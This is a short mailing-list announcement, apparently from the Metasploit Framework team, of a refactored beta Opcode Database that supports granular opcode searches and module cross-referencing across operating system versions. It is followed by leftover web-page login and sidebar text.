The Opcode Database has been refactored in order to support more granular queries. The new version provides users with the ability to easily cross reference specific opcode types, classes, and meta classes across one or more modules for one or more operating system versions. This level of granular control allows for a robust and flexible interface that can be used to determine opcode portability. Aside from opcodes themselves, the opcode database also contains detailed information about the segments, imports, and exports that are associated with each module in the database.
A quick overview of the features included in the new database are:
- Granular searching of opcodes of a specific type, class, and meta class.
- Searching modules provided directly from Windbg's module list.
- Cross referencing opcodes across various operating system version.
- Detailed module information including segments, imports, and exports.
You can access the beta version of the new Opcode Database at:
http://metasploit.com/opcode_beta.html
Enjoy!
- The Metasploit Framework Development Team
( hdm, spoonm, skape, and vlad902 )
Dailydave mailing list
Dailydave@lists.immunitysec.com
https://lists.immunitysec.com/mailman/listinfo/dailydave"
|
|
Login
Don't have an account yet? You can create one. As a registered user you have some advantages like theme manager, comments configuration and post comments with your name.
Big Story of Today
There isn't a Biggest Story for Today, yet.
|
Manager- IT security in Canada (Canadian citizens or PR)